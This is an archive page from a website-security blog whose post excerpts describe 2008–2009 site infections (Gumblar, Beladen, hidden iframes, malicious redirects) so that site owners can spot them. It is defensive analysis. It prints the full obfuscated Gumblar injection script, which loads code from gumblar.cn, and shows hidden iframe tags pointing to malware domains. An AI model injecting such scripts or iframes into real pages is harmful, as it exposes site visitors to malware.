Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
Loading site search ...

Beladen – Elusive Web Server Exploit. (information for site owners and hosting providers)

18 Jun 09   Filed in Website exploits with 24 Comments

There has not been much buzz about the recent Beladen attack. Although some sources estimated 40,000 infected web sites, it was clearly not as prominent as the Gumblar. To my mind, it’s because of the elusive nature of the Beladen exploit. It is very difficult to detect. It works intermittently. Only a small percentage of site visitors are exposed to malicious content. Many security scanners just overlook it.  Most likely the spread of this attack is underestimated.

In this post, I’ll list every fact I know about the Beladen exploit and hope you will add any missing information in the comments. This format proved to be very fruitful in my recent post about the Gumblar exploit where your 150+ comments made my article the most informative online resource about that attack that most other sites (including major media) referred to.

I hope the information you will find here can help site owners and hosting providers understand the nature of the exploit and get rid of it.
Continue »»

Gumblar .cn Exploit – 12 Facts About This Injected Script

07 May 09   Filed in Website exploits with 194 Comments

I’ve been watching this exploit for about a week now.  During the last couple of days it became the prevailing problem detected by Unmask Parasites.

I don’t have reliable information about how the infection occurs. However I have compiled a list of facts that might be useful if you are fighting this exploit.

1 Infected web pages contain a script that looks like this

(function(jil){var xR5p='%';e val(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56ers"69on()+"22"2c"6a"3d"22"22"2cu"3dnavig"61t"6fr"2e"75s"65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzrvzts"3d"22A"22"3b"65va"6c("22if(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72"22+"62"2ba+"22Minor"22"2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu"6de"6e"74"2ewr"69"74e("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g);
Continue »»

Another Type of IFrame Hack (PHP Exploit)

29 Apr 09   Filed in Website exploits with 36 Comments

This is a quick post about yet another type of hidden iframes injected into legitimate web pages.

The HTML code may look like this:

<iframe src="http:// xtrarobotz .com/?click=BC0230" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Domain names may vary, and the number of different iframes injected into a single web page may be different. The distinguishing feature of this exploit is the “?click=<hex_number>” part of the URL, where <hex_number> is some hexadecimal number.
Continue »»

Malicious “Income” IFrames from .CN Domains

15 Apr 09   Filed in Website exploits with 78 Comments

New week, new leader. I mean various hidden iframes from .cn domains injected at the bottom of home pages.

The html code looks like this

<iframe src="http: //lotmachinesguide .cn/ in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>

The domain names may vary but they always end with .cn. The domain names usually contain words lot and bet. They all reside on the same server with the IP address 94 .247 .3 .150.  The iframes load pages with paths similar to  “in.cgi?incomeNN”, where NN is some arbitrary number.
Continue »»

Malicious “Stats” from

02 Apr 09   Filed in Website exploits with 2 Comments

This is a post about this week’s prevalent website infection. There are quite a few modifications but they all link to the same IP-address: 84 .244 .138 .55 and if Google detects the malicious scripts it blacklists infected sites reporting that “Malicious software is hosted on 1 domain(s), including

I’ve seen two modification of the malicious script:
Continue »»

Fake Yahoo Counter Script Unmasked

12 Mar 09   Filed in Website exploits with 1 Comment

Fake Yahoo! counter script injection has been the most “popular” security problem for the last couple of week in the “Malware & hacked sites” section of the Google’s webmaster help forum.

This script is not a new exploit but it looks like we have a new surge that affects thousands of sites, so I decided to review it. Continue »»

Black Hat SEO for Virus Dissemination.

24 Jan 09   Filed in Website exploits with Comments Off on Black Hat SEO for Virus Dissemination.

In the previous post I talked about the exploit that redirected Googlebot to malicious sites. This time I’ll talk about how I investigated this issue and what I discovered.

This started about a week ago when I noticed a few sites with suspicious redirects in Unmask Parasites reports. There was a chain of two 301 redirects: -> “http://bablo .me .uk/”  -> “http://www. 524045. secki .info/”. Sometimes “bablo me uk” redirected to other sites that always contained a random 6 digit number as a subdomain name.  I decided to find out what was going on. Continue »»

Exploit Redirects Googlebot to Malware Sites (Bablo me uk).

19 Jan 09   Filed in Website exploits with 20 Comments

Some time ago I noticed a few sites with a suspicious chain of redirects that always started with “http://bablo .me .uk/” followed with a site with a random 6 digit number as a sub-domain name (e.g. http://www. 524045. secki .info/).

I decided to follow the redirects and find out where they lead to. What I found was a server hosting hundreds of sites optimized for trojan dissemination. I’ll blog about my investigation later. Now let’s talk about the things web masters should know about this exploit.


  • PHP-dirven site. (Especially Joomla-driven)
  • Problems with having web site properly indexed by Google. Some pages don’t get indexed, some pages disappear from the index. If not – it’s only a matter of time.
  • When checking web pages in Unmask Parasites, there is a chain of two 301 redirects reported and the first redirect points to “http://bablo .me .uk/”. However when opening the same pages in a browser, no redirection occurs (even when clicking on Google search results.)

Continue »»

Gogo2me – Hidden IFrame Injection.

14 Jan 09   Filed in Website exploits with 29 Comments

New Year has come with a new surge of website exploits. I see many help requests on BadwareBusters caused by the same problem.


  1. In Google search results, your site links are marked with a “This site may harm your computer” warning and you see an abrupt decrease in Google search traffic.
  2. When trying to open your web pages, users of Firefox 3 and Google Chrome browsers see a warning that your site is an “attack site”.
  3. If your site is registered with Google Webmaster Tools or AdWords, you receive an email from Google notifying that your site is a reported attack site and some of your web pages link to the following sites that host malicious software: 94 .247 .2 .0/ and gogo2me .net/
  4. Google’s Safe Browsing Diagnostics pages for your site also report that your site links to 94 .247 .2 .0/ and gogo2me .net/

Continue »»

Antivirus 360 redirection exploit

19 Dec 08   Filed in Website exploits with 3 Comments
Antivirus 360 exploit

This is a new post in the series about the Antivirus 2009 .htaccess exploit. I want to share some new information on the topic.

Continue »»